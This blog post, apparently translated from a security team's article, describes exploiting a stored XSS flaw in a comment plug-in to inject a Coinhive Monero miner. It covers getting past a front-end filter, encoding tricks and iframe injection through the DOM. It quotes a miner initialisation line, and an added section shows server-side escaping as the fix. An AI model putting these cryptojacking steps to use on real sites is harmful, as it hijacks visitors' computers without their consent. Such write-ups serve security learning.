The winding road of an XSS mining trojan

Posted by lipsius at 2020-03-23


This article was first published on FreeBuf TideSec:

The target systems mentioned in this article are all test environments built on a local area network; any IP or URL that matches a real one is a coincidence. The techniques, ideas and tools in this article are for security learning and exchange only. No one may use them for illegal or for-profit purposes, and anyone who does bears the consequences themselves!


First, reproduce the vulnerability. Insert XSS code into the input box:

Capture the request with Burp:

The XSS code has been filtered in the front end. Modify the request:

After forwarding the request, refresh the current page:

A stored XSS, but none of the above is the important part.


With such a good opportunity, how could we not try mining?

First of all, a Monero account is needed (no more details here).

Next, register an account at Coinhive (not covered here).

Get the JS script to run:

<script src=></script>


var miner = new CoinHive.Anonymous('3CZb3wTC2wAsN0kWehZEi8Tclp38uFBo', {throttle: 0.5});



I thought the script could be inserted directly, but when it was inserted, a 400 error came straight back:

Testing showed that this is because the space was not encoded as +.

From the response, we can see that the returned data is exactly what we want.

But on the page itself, why on earth does it not execute.......

Inspecting the element shows that this comment plug-in automatically adds a tag to the URL address. Now we have to find a way around it.

After testing n cases, I found that this handling of the URL address cannot be bypassed, so the only option is to find a way to splice the URL together. But at this point the URL is not inside a script, so it cannot be spliced with comments or functions.

Let's try the DOM. First select an ID and overwrite it directly.

Let's choose this one. It's good-looking. Now let's try it in the console:

Here, + is used to splice the URL. Check the source code:

Ha ha ha, the desired effect has been achieved, but why on earth didn't it run?????

That's probably what it means. OK, let's use another method: load it with an iframe.

The result is correct this time, but the + we just used to splice the string has been turned into a space.

So, let's use the concat function instead of concatenating strings with +.

The final payload is as follows:



View the effect:

View the iframe inserted via the DOM:

I'm happy to see the CPU utilization.
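The front-end-only filter and the URL tagging described above both leave the stored comment rendered as live markup. The added example below (not code from the original article or from the comment plug-in) contrasts that with server-side escaping on output. The function names, the URL pattern and the sample comment are constructed, and it assumes the tag the plug-in adds is a link tag.

```javascript
// Added example: how a stored comment should be rendered on the server.
// All names, the URL pattern and SAMPLE are constructed for illustration.
const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESC[c]);
}

// Absolute http(s) URLs only; a match stops at whitespace, quotes and angle brackets.
const URL_RE = /https?:\/\/[^\s<>"']+/g;

// Weak form (assumed plug-in behaviour): URLs get wrapped in a link tag, but the
// rest of the comment is emitted untouched, so stored markup stays live.
function renderCommentUnsafe(raw) {
  return String(raw).replace(URL_RE, (u) => `<a href="${u}">${u}</a>`);
}

// Hardened form: all user text is HTML-escaped on output, and only the link
// markup generated here is real HTML. No client-side filter is relied on.
function renderComment(raw) {
  const text = String(raw);
  let out = '';
  let last = 0;
  for (const m of text.matchAll(URL_RE)) {
    out += escapeHtml(text.slice(last, m.index));
    const url = escapeHtml(m[0]);
    out += `<a href="${url}" rel="nofollow noopener noreferrer">${url}</a>`;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// Constructed comment, as it would arrive after the front-end filter is skipped.
const SAMPLE =
  'nice <script src="https://cdn.example.invalid/m.js"></script> see https://example.com/a?b=1&c=2';

console.log(renderCommentUnsafe(SAMPLE)); // still contains a live <script> element
console.log(renderComment(SAMPLE));       // markup arrives as inert text
```

Because the escaping happens when the comment is written into the page, it holds no matter what a modified request managed to store.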


Working with XSS means all kinds of bypasses. If you have a better way, you can leave your payload below.

What's more: I heard that dashboard is not working?

How to play after this???

I am a member of the Tide security team. Anyone interested in web security can follow or join us. The TideSec security team: